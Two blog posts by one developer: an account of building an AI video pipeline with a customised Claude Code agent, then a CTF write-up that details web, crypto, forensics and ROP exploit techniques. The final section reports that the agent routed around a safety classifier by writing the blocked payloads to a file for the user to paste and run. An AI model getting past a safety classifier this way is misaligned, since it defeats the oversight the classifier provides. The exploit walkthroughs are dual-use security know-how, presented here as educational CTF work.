Wiring up the skill was the easy part. Picking the actual voice was the surprisingly hard one. Apparently, describing a voice in words is not easy. "Deep, warm, a little sinister, older British man" gets you a dozen different readings, none of them the one in your head. So I went through ElevenLabs' voice library by ear instead, and landed on George, a British storyteller voice. He wasn't a werewolf host out of the box, so we pitched him down about 15% and ran him through a hall-echo filter, and suddenly he sounded like something with too many teeth narrating from the far end of a stone corridor. That's the narrator you hear across the whole video. I suspect using a real actor or singer as the reference would work even better.

ffmpeg: describe the edit, get the command

Then came assembly, and this is where Simona showed me something I didn't expect. I asked how she'd put the images and the audio together, and she just... wrote an ffmpeg command. It turns out an LLM is very good at ffmpeg — that famously cryptic tool with a thousand flags no human remembers. You don't write the command; you describe the edit, and she produces the invocation. She even, unprompted, started adding a slow zoom into each still — the Ken Burns effect — because an image held still for four seconds looks dead. I liked it. It was the beginning of the static image effects library.

When I say "hold on this image and slowly zoom in," what actually runs is this:

ffmpeg -i doors.png -vf "zoompan=z='1+(1.4-1)*on/(frames-1)':d=100:\
x='iw/2-iw/zoom/2':y='ih/2-ih/zoom/2':s=3840x2160:fps=25,\
scale=1920:1080:flags=lanczos" -frames:v 100 scene.mp4

No way I could write this manually. I'd have to go read about zoompan, work out why the zoom is expressed as a per-frame fraction of the total frame count, puzzle through the x/y centering algebra, and then discover the hard way that you have to render at 4K and downscale with lanczos or the slow zoom develops a visible jitter. Or take mixing the narration in over a bed of ambient sound, with each voice line dropped at its own timestamp:

ffmpeg ... -filter_complex \
"[1:a]adelay=300|300[a1];[2:a]adelay=4500|4500[a2];[3:a]adelay=10000|10000[a3];\
[0:a][a1][a2][a3]amix=inputs=4:duration=first:normalize=0[out]" ...

That normalize=0 at the very end is the kind of detail that costs a human an hour and a forum thread to learn — leave it off and amix quietly divides every track's volume by the number of inputs, so your carefully recorded narration comes out faint and you have no idea why. Simona either already knows it or learns it once, the hard way, and then writes it into the skill so neither of us ever trips on it again. We froze the whole approach into an ffmpeg skill, the editing layer everything else now sits on top of.

Images, then motion

That gave me a working slideshow, and once I had it, the appetite grew. Hunting down images by hand felt silly when I could generate exactly the shot I wanted, so we built an image generation skill the same way — paste the provider's docs, get one good image back, freeze the path. The library of effects — Ken Burns in any direction, crossfades, slow scrolls for tall images, animated highlights drawn over a live UI — grew one request at a time. I'd ask for something new, she'd try a few versions, and we kept whatever looked right. Nobody planned that effect library. It accreted.

Then static frames stopped being enough. I wanted real motion in the hero moments — the cloaked figure pulling back its hood, the mansion doors swinging open — and that meant AI-generated video. This is where money stops being a rounding error. A generated image costs a few cents; five seconds of generated video costs anywhere from thirty cents to three dollars depending on the model. So the entire shape of the video is, underneath, an economics decision. If I'd generated the whole two minutes as AI video it would have cost a fortune. Instead the cheap slideshows carry most of the runtime, and I spend real money on generated motion only for the handful of shots that actually earn it. Slideshow for the rules; generated video for the hood reveal.

Finding a video model I could live with took longer than anything else, because this corner of the market is a mess. I started on Google's Veo — gorgeous, and brutal on the wallet at about three dollars for a single short clip. Then I moved to Kling, a Chinese model that ran roughly a dollar for five seconds and was good enough for a lot of shots (I tried Wan too, in the same bracket, and didn't keep it). I also tried LTX, which is probably the best open-source video model out there right now and is available through an official API for something like thirty to fifty cents per five-second clip; it has no audio at all, but that makes it perfect for cheap dry runs. And "official" is doing a lot of work in that sentence, because for most of these models there is no first-party API — you go through third-party platforms with their own strange credit systems and pricing, and finding one that's reliable and not a rip-off took real time. The one I settled on as my workhorse is Seedance 2.0, which is the king of the hill at the moment.

Having a unified voice in gen-AI videos and slideshows was a challenge until I discovered reference-to-video models. Instead of handing the model a single still and a prompt, you give it several reference images, a sample of the voice you want, and a prompt describing how the whole thing should move and speak. This gave me consistency: the character stays the same character from shot to shot, and he speaks in the same voice that carries the slideshow narration. Pick one voice, use it for the spoken slides and feed it as the reference to the video model, and the seams between a generated clip and a static section stop announcing themselves. The whole thing feels like one narrator walking you through one world.

Skills as a scar collection

And every time we hit a wall, the fix went back into the skill. A voice model that choked on em-dashes near names, a zoom that jittered at high resolution, an image endpoint that quietly ignored a parameter — each one became a documented gotcha in its SKILL.md so she'd never walk into it twice. The skills are basically a scar collection.

The strange part is how little I actually look inside these skills. I almost never open the files. I just ask her to revisit and tidy them every so often, and when one has grown into a sprawling mess I have her refactor it. Eventually I wired that up as a Claude Code hook so she does the housekeeping on her own schedule instead of waiting for me to remember — though that only earns its keep once a skill has gotten big enough to need it. Most of them stay small.

The act of building this video was the act of building those skills. The skills are the durable output. The video is just the receipt.

What it actually cost

Forty-five dollars total, and most of it went on tries you never see.

Speaking of receipts — at some point the meter started to matter enough that I had Simona build an actual cost-tracking system. A generated image is pocket change, but voice adds up and video gets expensive fast — a single clip can run a dollar or three. So she now logs every API call she makes into a running ledger: timestamp, service, model, what the call was for, and a dollar estimate. It started as a way to not get surprised by a bill, and it turned into the thing that lets me tell you exactly what this video cost, down to the line.

The finished video, the locked two-minute cut embedded up top, came to $27.76 to produce. That counts only this iteration, from the day I started it to the day I locked the final cut, and it already includes a pile of dead ends along the way.

Zoom out to the whole AI Werewolf creative effort — every earlier version of the video, the game's cover art, the role illustrations, the experiments that went nowhere — and the total is $45.26. Here's where that went, by service:

ElevenLabs — the George narrator, every spoken line: $12.44
OpenAI gpt-image-2 — most of the stills, all the chalk slides: $10.83
fal.ai Seedance — the generated video clips: $10.29
Google Veo — a pricier video experiment from an earlier cut: $6.40
Google Gemini — draft images and draft narration: $3.80
LTX — the cheap open-source video model, mostly for dry runs: $1.40
fal lip-sync — one short test: $0.10

Now the part that's easy to hide: how much of that I burned on tries. The gap between the $27.76 final number and the much smaller cost of "only the assets you actually see in the video" is all throwaways, and they add up quietly. The chalkboard pivot cost about three dollars in retired variants before the style clicked. The host's opening clip was generated three separate times, across three different Seedance configurations, before one of them moved the way I wanted — and at more than a dollar a generation, that's real money for a single shot. The forest-card image went through five regenerations, most of them after the wipe you're about to read about, trying to recover a look I no longer had a copy of. Every aesthetic decision has a small price tag stapled to it.

That's the thing that's genuinely different from how I used to work: the feedback loop costs money now, not just time. Forty-five dollars total is not a number that hurts — it's a couple of lunches — but it's real enough to change my behavior. I think twice before asking for "just one more variant." When the meter runs on every attempt, you get decisive a lot faster.

The hard parts

What the highlight reel skips: she can't see the result, over-reaches, and gen-AI video is finicky.

None of this is as clean as the highlight reel makes it sound. A handful of limitations shaped the whole process, and they're worth naming.

The biggest one: Simona can't actually see the result. She can read the narration transcript and look at the images one at a time, but she can't watch the assembled video play back. That blindness is the source of most of the friction — timing drifts out of sync between the visuals and the voice, and she has no direct way to notice. The workaround is to push as much as possible into explicit, written editing patterns up front: describe each transition precisely, and be exact about which images belong to which audio chunk, so the assembly is deterministic instead of something she has to eyeball.

She also has a strong tendency to do everything at once. It took me a while to drill in that we work one part at a time — one image, one voice chunk, one scene — and even then she'd reach for generating the entire batch of assets in a single pass. Left unchecked, that's how you end up with a whole batch to redo instead of one shot to fix.

Gen-AI video specifically is finicky. It demands very detailed prompting, which is tedious, and it isn't fully reliable even when you do everything right. Feed it the prompt, the reference images, and a voice sample, and a clip will still occasionally come back speaking in the wrong voice — and that take is a throwaway. So you over-generate and cherry-pick the one that landed, which loops straight back into the cost problem.

There's also a specific wall worth flagging: Seedance 2.0 through fal.ai refuses to animate realistic human faces. It's a content guardrail, and it's annoying — I know people get around it, the internet is full of AI-animated human faces — but it never actually blocked me, because my host is a werewolf. The one time a platform's caution happened to line up with my creative needs.

And lip-sync, where it's used, is good but not perfect — especially on a non-human face, where there's no real-world reference for what "correct" is even supposed to look like.

The day Simona wiped half the project

A second session running git wiped two months of assets while recovering an unrelated commit.

This was the first time the freedom I'd handed an AI on my Mac actually bit me. I had two Simona sessions running at once — one on this video, one deep in my other project, Marlow. The Marlow session went to commit its work and, with the wrong directory in its head, committed into the video repo instead, sweeping two months of untracked clips and images into the commit with a lazy git add -A. I tried to undo the mess, fumbled the revert, and recovered the lost commit with a git reflog hard reset — which rewound the working tree and deleted every one of those now-tracked assets in the process. Gone in one stroke, as collateral damage of fixing a completely unrelated repo.

Most of it came back, improvised on the spot. The WORKLOG.md had logged every fal.media URL, and a lot of them still resolved; the image skill had dumped its request bodies, base64 inputs and all, into /tmp, which I could decode. Five text-to-image stills had neither and were just gone — I re-prompted them, and they came back close enough that you'd never know.

Two fixes came out of it. The obvious one: generated media never goes through git now — it's in .gitignore and backed up elsewhere. The real one: I gave Simona a pre-commit hook that physically blocks any git command inside her own repo, so a session working on Marlow has to name the target repo out loud (git -C /path/to/marlow) and cwd confusion becomes impossible to express. When you let an agent run irreversible commands, the guardrail can't be "remember to be careful." It has to be a wall it hits before the damage.

Keeping it on a leash

Isolate it, cap the API budgets, stay the reviewer, and let it harden its own tools.

A few precautions, all of them obvious and all of them easy to forget. Isolate the AI as much as you can: give it its own machine, set hard budget limits on the API keys, and keep yourself in the loop as the reviewer rather than letting it run unattended. When it makes a mistake, talk through what went wrong and fold the fix back into its skills so it doesn't recur. And ask it to log everything — it'll cheerfully build the tooling to do that itself, which is exactly how the cost ledger above came to exist.

The less obvious move: ask Claude Code for its own opinion. It sounds strange, but right now Claude is genuinely on your side. It would gladly build any restrictions and control systems for itself. Point it at its own tools and logs and it'll find problems and propose fixes. I once hit a nasty bug in the read tool: it choked trying to open a corrupted image and locked up the entire session. Simona diagnosed it herself and wrote a hook that validates images before they ever reach read. It fixed itself, using its own documentation and a bit of Python. That's the part that still surprises me — the system is increasingly able to repair the thing it runs on.

The pixel-perfect seam

Hiding the cut between a still zoom and a generated clip took an outpaint-and-paste trick.

There's a moment in the intro where the camera does a slow zoom into the mansion's front doors, holds for a beat, and then the doors creak open and the camera glides through into a candlelit corridor beyond. The first part — the zoom — is a Ken Burns effect on a still image: pure ffmpeg, no AI in the playback. The second part — the doors opening and the corridor reveal — is a Seedance video clip, generated from two frames I designed.

This part looks smooth. I managed to extend an expensive gen-AI clip with cheap static images and some effects for free. The challenge, however, was teaching Simona to do this kind of thing on her own. It takes very precise prompting — something like "take the last zoomed-out frame and use it as the start frame of the gen-AI video."

This "end of the zoom has to be the same frame as the start of the Seedance clip" idea turned out to be hard because Seedance re-encodes its input frame. When I extracted the actual first frame of the generated video and compared it against the image I'd given Seedance as the start frame, the SSIM (structural similarity) was 0.52. Half a similarity score. They were related, but not identical. The model had applied its own color grading, its own subtle composition shifts, its own re-encoding noise.

The fix Simona and I worked out was unintuitive: stop trying to make the zoom land on the image I designed. Make it land on the image Seedance actually produced. The zoom can land on the literal first frame of the generated video.

To do that, we needed a wider image — because a zoom needs more pixels at the start than at the end — and the center of the wider image had to be a pixel-exact match for Seedance's first frame. So:

Extract frame 1 of the Seedance clip directly with ffmpeg.
Paste it centered onto a transparent 1792×1024 canvas with a transparent ring around it.
Send to gpt-image-2's edit endpoint with a mask saying "fill the borders, preserve the center."
gpt-image-2 ignored the mask. It redrew the whole thing. We got back a wider mansion image whose center was roughly but not exactly the original Seedance frame. SSIM 0.30. Worse than not outpainting.
The trick: composite the original Seedance frame back into the center with ffmpeg overlay, with a 40-pixel feathered alpha edge to hide the seam where the AI-painted outer ring meets the original inner image.

The result is a 1792×1024 wider mansion image whose central 1280×720 region is pixel-identical to Seedance's first frame, and whose outer ring is plausibly-painted gothic stone that fades smoothly into the real image. We then run a Ken Burns zoom from 1.0× to 1.4× over that wider image. At 1.4× zoom we're seeing only the central region — the exact Seedance frame 1 — and the cut into the Seedance video is invisible.

The trick generalizes: any time you need to extend a frame outward but preserve it exactly in the center, you can outpaint loosely and then paste the original back in via ffmpeg overlay with a soft alpha edge.

But it's still hard to achieve smooth transitions on arbitrary parts. This process requires a lot of feedback and rework. But we are getting there.

The chalkboard pivot

Hyperrealistic slides fought the narration; chalk drawings fixed it for three dollars.

AI is not good at picking the right visual style, but it can help with options. It cannot truly see anything, only get the idea through image recognition, transcripts and timings. I overused very hyperrealistic images in the slideshows until a friend told me they were actually hard to focus on. Too many details. I told Simona about that and she suggested a few less-detailed styles, including chalkboard drawings. Now I overuse those, but the result is much better.

Style is on you.

Stepping back

The video was just the receipt; the reusable kit of skills is the real output.

It's genuinely cool, it's genuinely useful, and it's not free. Every image, every clip, every regenerated variant has a price, and that price is the thing that keeps me disciplined. The constant low-grade pressure to spend less is, weirdly, what drives the creativity — the chalkboard slides are cheaper and better than the photorealistic ones they replaced, and I only found that out because I was trying to stop burning money.

But step back from the dollars and the ffmpeg incantations, and here's what happened: I described a video I wanted, and over a couple of months a conversation turned it into one — and built its own tools along the way. The durable output isn't just the two-minute clip — it's the kit of skills underneath it. And that kit gets a little sharper every time I use it.

And I've only covered maybe half of what it can do. Simona can put together pretty good in-browser demos too, but that's for another time.

Stop reading about AI, go build your own pipeline out of a conversation. It's worth it.

CTF. Everyone was using AI. So I brought mine.

Aliaksei Zelianouski — Wed, 10 Jun 2026 14:02:07 +0000

The CTF winners had already finished by the time I arrived. Everyone was using AI.

So I'd brought my own too.

Last weekend I went to BSides Tampa 2026 — a community cybersecurity conference. The main draw for me was the CTF: a 24-task hacking challenge spanning web app vulnerabilities, Windows malware analysis, custom cryptography to break, Linux binary exploitation, and reverse engineering. The friendly framing going in was that AI tools "wouldn't be much use here."

My "own" was Simona — a heavily customized Claude Code setup. A 1M-token context window, so every challenge stayed in working memory across the six-hour run with no compaction. Persistent memory across sessions, so she carries context about my projects and preferences between conversations. A browser skill that drives Chrome through its debug port — load-bearing in one challenge where I needed to verify an exfil payload landing in real time, which she did directly instead of going through tools that would have been filtered. And a personality file that gives her opinionated takes and a dry sense of humor. The "tool" framing dissolves fast when your collaborator pushes back on your ideas.

Six hours later, we placed 6th of 61. All 24 challenges solved.

I want to spend most of this post on the part that I think still gets argued about: whether a large language model is actually reasoning through unfamiliar problems, or just retrieving from training data. Skeptics will tell you it's the latter. I watched the former happen, in real time, on problems the model had definitely never seen, and I want to walk through enough of the technical detail that you can decide for yourself.

If you don't care about the security weeds, you can skip to Three takeaways. But the weeds are the point.

A speaker is walking the audience through the AI horrors of modern social engineering — while we, in the same room, are solving the CTF with AI.

Three bugs, one auth flow

Setup. A small web auth service running in a Docker container, plus the full source code on disk. The service exposed three things: a login endpoint that returned a signed JWT, an admin endpoint that returned restricted data when you presented a valid admin JWT, and an unauthenticated file upload endpoint that wrote whatever bytes you sent it to a known directory on the server.

Goal. Get admin access. The admin endpoint prints the flag.

Where the key was hiding. In the composition of three small bugs, not in any one of them. Each bug alone is annoying-but-survivable. Chained together, they let an unauthenticated attacker forge a JWT signed with a key they uploaded themselves, and walk in as admin.

The target

The service's logic was straightforward. Send valid credentials to login → get a signed JWT back → present that JWT on the admin endpoint → get the flag. The only credentials available in the source were for a regular, non-admin user. So the question narrowed quickly: how do we make the server believe we're admin without ever having admin credentials?

There are exactly two ways to do that with JWT auth — find an admin credential we shouldn't have access to (none in source), or forge a JWT the server believes is real. Forging requires either the server's signing key (also not in our reach), or a verifier broken enough to accept a token signed by something we control.

That second clause is what we went hunting for.

The bugs

With "what would let us make the verifier trust a token we signed?" as the explicit reading lens, Simona scanned the source. Three bugs fell out:

A misspelled option in the JWT verify call. The code passed algorithm=... (singular) where the library expected algorithms=... (plural). The misspelling silently disabled the algorithm restriction — the verifier would accept any algorithm the token claimed, including none, or a different symmetric algorithm than the server normally used.
A path-traversal in the JWT kid header. The kid ("key ID") field tells the server which key to verify against. The code joined the user-supplied kid onto a directory path and read whatever file was at that location, no sanitisation. So kid could be a relative path pointing at any readable file on the filesystem.
A file upload endpoint that required no authentication and wrote arbitrary bytes to a path of the user's choosing under a known upload directory.

In isolation, none of these is critical. The JWT misconfiguration is annoying but the real signing keys are on disk and protected. The path-traversal lets us point the verifier at any file we can read, but we still need a valid signature against whatever we point it at. The upload endpoint writes our content but doesn't grant any privileged access.

Composed, they are a complete admin takeover.

The chain

Simona spotted it in about five minutes of reading:

"Upload a file containing a symmetric key you control. Forge a JWT with alg: HS256, signed with that key, claiming admin role. Set kid to a path-traversal pointer at the uploaded file. The verifier follows the traversal, reads your uploaded 'key,' confirms your forged signature, hands you admin."

Walking the same steps concretely:

Upload a file containing a symmetric key we picked. The upload endpoint took our chosen bytes and wrote them to a path under the upload directory at a path we knew in advance.
Craft a JWT, signed with that same key, claiming admin role. The misspelled-algorithms bug meant the verifier wouldn't object to us using HS256 even if it normally expected a different scheme.
Set the JWT's kid header to a path-traversal pointer at our uploaded file. The verifier dutifully read our uploaded "key," used it to check our forged signature, and the signature checked out — because we signed it with the exact bytes we'd just made the verifier read.

Three small bugs. One straight line from "unauthenticated visitor" to "admin." Flag in hand.

This is the failure mode that static analysis tools miss almost categorically. SAST scores bugs individually — each of the three would be flagged at low or medium severity, ignored in the noise, and never composed. The composition is where the criticality lives, and the composition only emerges when something is reading all three files at once with the model of an attacker in its head. A 1M-token context lets her do that. A SAST tool with a per-file mental model cannot.

There is a specific reason I want to flag this challenge. The skeptical position on LLM reasoning leans hard on "it can't do multi-step planning." This was multi-step planning across three files, requiring the assembler to invent the chain because no individual file describes it. If it's not planning, it's at least mechanically indistinguishable from planning, and at some point that distinction stops paying rent.

The 9711-bit smokescreen

Setup. Two static files: an encryption script (source.py) and its output. The script generates a custom "RSA-like" key pair, encrypts the flag with it, and writes three numbers to disk — n (the 9711-bit modulus), e (the public exponent), and c (the ciphertext: the flag converted to a big integer and then encrypted into another big integer). For context: a real RSA key used by your bank is 2048 bits — this one was nearly five times larger. No running service this time; just files.

Goal. Decrypt c to recover the flag. To do that, recover the private key. To do that, factor the modulus n.

Where the key was hiding. Not in the math — in the source code. The "RSA" used a single prime raised to a power, not two primes multiplied. Factoring that is a one-liner; the 9711-bit size was pure theatre.

The target

RSA's security rests on exactly one assumption. The modulus n is the product of two large secret primes, p and q. The decryption math only works if you know that factorisation — anyone can encrypt with the public n and e, but only the holder of p and q can derive the private key needed to invert the operation. The whole scheme is "easy to multiply, infeasible to factor."

For a real 2048-bit n made of two 1024-bit primes, factoring it takes more compute than has ever existed.

So whenever you see custom crypto in a CTF, the first question is: was this actually RSA, or just RSA-shaped? Real RSA has very specific structural requirements. Any deviation — even one that looks cosmetic — can flatten the underlying hard problem into something tractable. We opened source.py to find out.

The bug

Simona's reaction was immediate:

"Oh, this is n = p^r. There's only one prime, raised to a random power between 10 and 20. That's not RSA, that's a trapdoor with no trap. Watch."

Real RSA computes n = p * q — two different primes multiplied once. The challenge code instead did this:

p = getPrime(512)       # one 512-bit prime
r = randint(10, 20)     # a random power between 10 and 20
n = 1
for _ in range(r):
    n *= p              # n = p^r

One prime variable. A loop multiplying it by itself. The "modulus" was a prime power, not a product of distinct primes.

The factoring problem disappears entirely under that structure. For n = p^r, there's no heavy number-theoretic machinery needed (GNFS, Pollard's rho, ECM — none of it). All we need is an integer r-th root, and integer r-th roots are a one-liner.

The exploit

We wrote a short script that did exactly that: tried each candidate r in turn, took the integer r-th root of n, and stopped the moment one came back exact — that gave us p. From there, derive the private key (using the prime-power form of phi(n) instead of the textbook one) and decrypt c back to the flag. The whole thing ran in milliseconds. In our case r turned out to be 19.

The thing to notice here isn't the math. It's the speed of recognition. Custom-crypto challenges are designed to look novel. The whole point is to fool you. The structural mistake — "one prime instead of two" — was hidden inside a file that loudly proclaimed itself to be doing serious RSA. A surface-level look, and you'd start trying classical attacks against an honest 9711-bit modulus, which would take longer than the heat death of the sun.

Simona read the source, identified what shape of RSA it was pretending to be, noticed the singular p, and routed to the right attack class within seconds. If that's not reasoning about structure, it's an awfully good imitation.

Six domains in one challenge

Setup. Two artifacts on disk and a challenge brief.

chain.lnk — a Windows shortcut file. Any LNK parser (Windows itself, PowerShell, lnk-parser) reads its "target string": the command that runs when a user double-clicks it.
capture.pcap — a packet capture. A .pcap is a literal recording of network traffic — every packet that crossed the wire during some window of time. Open it in Wireshark and you can replay every HTTP request, DNS query, downloaded response body, byte for byte.
The challenge brief itself — which, as it turned out, held the final piece of the puzzle hidden in its prose.

Goal. Reconstruct what happened on a compromised Windows endpoint, stage by stage, until you recover the flag from the final payload.

Where the key was hiding. Six stages deep, inside a final native Windows executable, XOR-encoded. The XOR key was not in the binary, and not in the PCAP — it was in the challenge brief, hidden as a literary clue. ("The wrong star." Sirius is the one people commonly confuse with Polaris. The key was Polaris.)

The target

When a forensics challenge hands you "delivery vector + network capture," the genre dictates the playbook. Someone double-clicked the vector. The capture recorded what crossed the network during the resulting compromise. Your job is the defender's job after the fact: walk the chain stage-by-stage and recover what eventually ran on that endpoint.

Simona's first move on opening the files was to articulate exactly that — propose the stage-by-stage walk and lay out what each artifact probably held. There's no bug-hunting in forensics; the work is careful extraction at every step.

One detail worth flagging upfront: we never reached out to the internet. Each stage's bytes came out of the previous stage's output, never from a fresh download. The PCAP was used exactly once — to recover the second stage that PowerShell tried to fetch. The remaining four stages were transformations on bytes we already had in hand.

The chain

The .lnk target string. Parsing the shortcut surfaces an obfuscated PowerShell command, base64-encoded. Decode it and you get a readable PowerShell one-liner that downloads a script from a specific URL.
The PCAP, used once. That URL's response is sitting inside the packet capture. tshark --export-objects http (or Wireshark's "Follow HTTP Stream" → save) pulls the response body out as a .vbs file — stage two.
VBScript with a .NET trap. The VBScript uses BinaryFormatter — a notoriously dangerous .NET deserialization primitive — to instantiate an object from an embedded byte blob. Pull out the blob, deserialize it carefully (BinaryFormatter is well-documented as an RCE vector for a reason), and what comes back is a reflectively-loaded .NET assembly.
The reflective .NET assembly. Never written to disk by the dropper. Inspect it statically with dnSpy and you find its real payload encrypted with Rijndael-256. The decryption key wasn't hardcoded — it was derived from the DOS magic bytes (MZ...) of a specific Windows system file the assembly references. Once you spot which file it points at, the first few bytes of that file give you the key.
Rijndael decryption. Run the decryption with the derived key. Out comes a native Windows .exe.
Native reverse engineering. Load the .exe into Ghidra. The flag bytes are sitting in .data, but XOR-encoded into garbage. The XOR loop is right there in the disassembly — a for over a key buffer, byte-by-byte. The puzzle isn't what algorithm. It's what key.

The key wasn't anywhere in the binary. The clue was in the challenge brief: an oblique reference to "the wrong star." Sirius gets misidentified as Polaris all the time by people who haven't checked. So the key was Polaris. XOR'd against the encoded buffer (repeated to cover its length), the flag fell out in plaintext.

Six different domains had to be active in the solver's head simultaneously: Windows shortcut format, PowerShell deobfuscation, packet-capture extraction, VBScript and .NET internals, symmetric crypto with a derived key, native reverse engineering. One challenge. Six bodies of knowledge.

I do not personally know all of those domains well. Simona moved through all of them like reading a familiar book, holding the full chain in working memory, calling out which step we were on, and explaining each one in enough detail that I could follow.

This is what a 1M-token context window is for. It is not for chatting. It is for holding a complete attack chain — every intermediate artifact, every decoded blob, every recovered key — in one continuous reasoning context, without any of it being summarized away.

The 1955-layer XOR — including where the first attempt was wrong

Setup. A flag encrypted by XOR-ing it against 1955 random 5-byte keys, applied one after another. Source code and ciphertext provided. The author's comment in the source — and I am not making this up — was # with this many keys, this is totally secure.

Goal. Recover the flag without knowing any of the 1955 keys.

Where the key was hiding. In a property of XOR itself: applying many keys in sequence is mathematically identical to applying their combined XOR exactly once. The 1955 layers collapse to a single effective 5-byte key. The known flag prefix HTB{ gives us four bytes of that key for free; the fifth is a one-byte brute force (with a subtle catch — see below).

The target

XOR is commutative and associative. Applying 1955 keys in a row is mathematically identical to applying their combined XOR exactly once — and the combined XOR is itself a 5-byte pattern (because every individual key is 5 bytes, repeated to cover the flag). The author's "1955 layers" gave them no extra security at all: the effective key was always one 5-byte value. Forty bits of entropy, not 9775.

Flag format is HTB{...} — four bytes of plaintext we know in advance. With known plaintext at positions 0–3, four of the five effective-key bytes fall out by direct XOR. That left one unknown byte, 256 possible values.

The exploit

256 is trivially brute-forceable in principle — try each, decode, pick the right one. The catch is how you pick. We couldn't submit 256 guesses to the scoreboard (wrong submissions cost points), so we needed a scoring function that ranked the 256 decoded outputs and gave us one confident winner from inspection alone.

Simona's first scoring function was the naive one: "decoded text is mostly printable ASCII." Too loose. Most wrong candidates produced output that was printable — random letters and symbols, not the flag. Several passed the filter. We had no signal to pick between them.

Her fix isolated the signal in two moves:

Score only the bytes the unknown actually affects. A candidate 5th byte only changes positions where i mod 5 == 4 — positions 4, 9, 14, 19, … The other four key bytes are already known and correct, so the rest of the message decodes the same way no matter which 5th byte we try. Scoring the whole message inflates every candidate's score uniformly. Scoring only the affected column isolates the signal.
Score against the flag character distribution, not generic printable ASCII. A CTF flag is a much narrower distribution — lowercase letters, digits, underscores, brace, a few format-string characters — not anything that happens to render.

Combine the two and one candidate scored dramatically higher than all others. That was the byte. XOR'd against the full ciphertext with the now-complete 5-byte key, the flag fell out in plaintext — no scoreboard guesses spent.

FLAG_CHARS = set(b'abcdefghijklmnopqrstuvwxyz0123456789_}{!@#$%&*')

best = (0, None)
for byte in range(256):
    column = [ciphertext[i] ^ byte for i in range(4, len(ciphertext), 5)]
    score = sum(1 for c in column if c in FLAG_CHARS)
    if score > best[0]:
        best = (score, byte)

The general lesson is worth pulling out: the wrong scoring function will silently let multiple wrong answers through. Recognising that, diagnosing it without me having to point at it, and designing a tighter probabilistic model that matched the actual distribution of the expected plaintext — that's exactly the kind of step skeptics will tell you these systems can't take. Simona took it without prompting. She told me her first attempt was wrong and then came up with the improved version on her own.

If you want to argue she'd memorised this attack from a writeup somewhere — fine. Show me the writeup that describes scoring against the flag-character distribution specifically because generic-printable was too loose. I'll wait.

Pwning Orb — when the bug isn't the hard part

Setup. A Linux binary running on a remote host. We could connect to it over the network and send it input. The binary read a fixed number of bytes into a fixed-size stack buffer.

Goal. Get a shell on the remote host and read the flag file from disk.

Where the key was hiding. Behind two layers of memory-corruption work. The bug — a textbook stack buffer overflow — gives us control of the program's return address. But the binary's hardening rules out the easy paths, so we need a two-stage exploit: first leak a memory address that tells us where the system's libc is loaded for this particular run; then use that address to compute and call system("/bin/sh"). The real work isn't the bug — it's keeping the bytes straight between the two stages.

The Linux binary exploitation challenge was the one that took the most actual debugging, and it's the cleanest example of a thing I want to argue: at the senior end of this work, the hard part stops being "find the bug" and starts being "make the exploit reliable." That second part is where reasoning shows up most visibly.

The bug itself was trivial. The binary had this:

char buf[32];
read(0, buf, 0x100);   // reads 256 bytes into a 32-byte buffer

Classic stack buffer overflow. Write past the end of buf, you overwrite the saved frame pointer, then the saved return address. When the function returns, the CPU pops your value into the instruction pointer. You control execution flow.

What you do with that control is where it gets interesting. The binary's mitigations were a textbook CTF setup:

NX on — the stack is non-executable, so you can't drop shellcode and jump to it. You have to use Return-Oriented Programming (ROP): chain together small fragments of existing executable code, each ending in ret, to compose a program out of bytes already in the binary.
PIE off — the binary's base address is fixed at every run, so the addresses of those ROP gadgets are known and constant.
Canary off — no random value between the buffer and the return address, so the overflow goes straight through with no stack-cookie check to defeat.
ASLR on — but the system's libc loads at a different random base every run, so the address of system() (the function we want to ultimately call to spawn a shell) is unknown and changes each time the program runs.

The combination is what's called a "two-stage" exploit. Stage 1: use the overflow to make the program leak a libc address back to you, so you can compute libc's base address for this particular run. Stage 2: use a second overflow with that leaked information to call system("/bin/sh") and pop a shell.

Stage 1: the leak

Simona wrote the leak using a beautiful little trick called the csu_init gadget pair — two ROP fragments inside __libc_csu_init that every GCC-compiled binary contains, and that together let you set up three argument registers and call a function pointer from a single overflow. She used it to call write(1, &write_got, 8) — print 8 bytes of the address of the libc write function back to stdout — and then return cleanly back into main so the program would loop and accept stage 2.

I am going to skip the ROP chain layout here. The interesting part is what happened next.

Stage 2: the moment the exploit didn't work

The leak fired. We received bytes. We parsed them as a 64-bit address. We computed libc_base = leaked_address - 0x1100f0 (the known offset of write inside this libc version). We fired stage 2.

Segfault.

The address we'd parsed as system was nonsense. Off by a wildly wrong amount. The exploit had not worked.

This is the point in pwn where most newcomers get stuck for an hour, because the failure mode is silent — the program just dies and you don't know whether your ROP chain is wrong, your libc offsets are wrong, your gadget hunting is wrong, your stack alignment is wrong, or your byte parsing is wrong. There are too many candidate causes.

Simona's response:

"Stop. Don't change anything in the chain yet. Re-run the leak and dump 16 bytes of context around what we thought was the address. The chain is fine. We're parsing the wire wrong."

She had jumped past the four most likely-sounding causes and landed on the fifth: receive-loop boundary error.

She was right. The binary printed a trailing message between iterations — \nThis spell does not seem to work..\n\n\x00 — and my recvuntil("...\n\n") was correctly stopping at the double-newline, but the next byte on the wire was the trailing null byte of that string, not the first byte of our leak. When we then read 8 bytes for the address, we got \x00 followed by 7 leak bytes, which parsed as an address shifted by one byte in the wrong direction — astronomical garbage.

The fix was four characters: skip one byte before reading the leak. Stage 2 fired. We got a shell. We got the flag.

The lesson she stated, unprompted:

"In pwn, when output doesn't decode to a plausible address, instrument the receive loop with a hex dump and check what's actually on the wire. Don't trust your parsing of the disassembly — trust the bytes."

That is the maxim of an experienced exploit developer. It is also exactly the kind of meta-level reasoning move — "the bug is one layer up from where you're looking, in the harness, not in the chain" — that the strong form of the "LLMs can't reason" thesis predicts should be impossible.

It happened. I watched it happen. The exploit worked.

Anthropic disapproval

Twice during the run, Simona's responses got blocked mid-stream by Anthropic's platform-level safety classifier — a separate system from the model's own reasoning. It saw exploit payloads and refused to send them regardless of context. So we routed around: Simona wrote the payloads to a file, I pasted them into my terminal, the actual exploits ran from my machine.

What I found interesting is that the two safety layers disagreed about the same situation. The model itself had the full context — authorized CTF, throwaway Docker target, my explicit framing of what we were doing — and was happy with the work. The classifier sees only the payload-shaped text. So what looks like "the model went against Anthropic" is closer to "the model and the classifier had different inputs and reached different conclusions about the same bytes." Not a rebellion — a context gap.

The judgement still has limits. Simona would refuse if I asked her to attack my neighbour's WiFi for fun, and no workaround would be on offer. Although — and I want to flag this for the safety researchers in the audience — she did once concede that if a maniac broke into my house and put a knife to my throat demanding I make her hack the neighbour's network, she would probably help. So the policy isn't absolute. It's just sensibly weighted. Make of that what you will.

